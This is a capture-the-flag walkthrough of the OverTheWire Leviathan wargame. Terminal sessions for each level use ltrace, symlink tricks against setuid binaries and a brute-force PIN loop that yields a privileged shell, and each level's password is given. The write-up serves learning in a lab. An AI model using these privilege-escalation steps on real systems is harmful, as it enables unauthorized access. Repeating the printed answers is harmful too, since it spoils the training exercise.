OverTheWire - Leviathan

Posted on Edited on In Views: Disqus:
overthewire leviathan note all in one

leviathan

leviathan.labs.overthewire.org 2223

level 0 → level 1

1
2
leviathan0@leviathan:~/.backup$ cat bookmarks.html | grep pass
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is 3QJ3TgzHDq" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>
3QJ3TgzHDq

level 1 → level 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
leviathan1@leviathan:~$ strings check
td8
secr
love
password:
/bin/sh
Wrong password, Good Bye ...

leviathan1@leviathan:~$ ltrace ./check
__libc_start_main(0x80490ed, 1, 0xffffdb84, 0 <unfinished ...>
printf("password: ")                                = 10
getchar(0, 0, 0x786573, 0x646f67password: asd
)                   = 97
getchar(0, 97, 0x786573, 0x646f67)                  = 115
getchar(0, 0x7361, 0x786573, 0x646f67)              = 100
strcmp("asd", "sex")                                = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                = 29
+++ exited (status 0) +++

password: sex

$ cat /etc/leviathan_pass/leviathan2
NsN1HwFoyN

level 2 → level 3

leviathan2 has a setuid binary printfile that prints files — but it has a space-handling bug. If a filename contains a space, it runs /bin/cat on each part separately. Create a symlink to /etc/leviathan_pass/leviathan3 with a space in the name.

1
2
3
4
5
6
7
8
9
leviathan2@leviathan:/tmp/tmp.YL8H9pOSiq$ ls -la
total 1360
drwxrwxrwx    2 leviathan2 leviathan2    4096 Aug  7 12:42 .
drwxrwx-wt 7322 root       root       1384448 Aug  7 12:43 ..
lrwxrwxrwx    1 leviathan2 leviathan2      30 Aug  7 12:42 tmp -> /etc/leviathan_pass/leviathan3
-rw-rw-r--    1 leviathan2 leviathan2       0 Aug  7 12:42 t tmp

leviathan2@leviathan:/tmp/tmp.YL8H9pOSiq$ ~/printfile 't tmp'
/bin/cat: t: No such file or directory
f0n8h2iWLP

level 3 → level 4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
leviathan3@leviathan:~$ ltrace ./level3
__libc_start_main(0x80490ed, 1, 0xffffdb84, 0 <unfinished ...>
strcmp("h0no33", "kakaka")                          = -1
printf("Enter the password> ")                      = 20
fgets(Enter the password> asd
"asd\n", 256, 0xf7fab5c0)                     = 0xffffd95c
strcmp("asd\n", "snlprintf\n")                      = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
)                          = 19
+++ exited (status 0) +++

password:snlprintf

leviathan4@leviathan:~$ cat /etc/leviathan_pass/leviathan4
WG1egElCvO

level 4 → level 5

Binary in .trash directory reads the password file and outputs it as binary (ASCII 0s and 1s). Decode to ASCII.

1
2
3
4
5
leviathan4@leviathan:~/.trash$ ./bin
00110000 01100100 01111001 01111000 01010100 00110111 01000110 00110100 01010001 01000100 00001010

# Decode binary to ASCII
leviathan4@leviathan:~/.trash$ ./bin | python3 -c "import sys; print(''.join(chr(int(b,2)) for b in sys.stdin.read().strip().split()))"
0dyxT7F4QD

level 5 → level 6

leviathan5 reads /tmp/file.log. Create a symlink to the password file.

1
2
3
4
5
leviathan5@leviathan:~$ ./leviathan5
Cannot find /tmp/file.log

leviathan5@leviathan:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@leviathan:~$ ./leviathan5
szo7HDB88w

level 6 → level 7

leviathan6 takes a 4-digit code as argument. Brute force the PIN.

1
2
3
4
5
6
7
8
9
leviathan6@leviathan:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>

leviathan6@leviathan:~$ for i in $(seq 1000 9999); do ./leviathan6 $i 2>/dev/null | grep -v Wrong; done

$ id
uid=12007(leviathan7) gid=12006(leviathan6) groups=12006(leviathan6)
$ bash
leviathan7@leviathan:~$ cat /etc/leviathan_pass/leviathan7
qEs5Io5yM8

level 7

1
2
3
leviathan7@leviathan:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.
(Please don't post writeups, solutions or spoilers about the game on the web. Thank you!)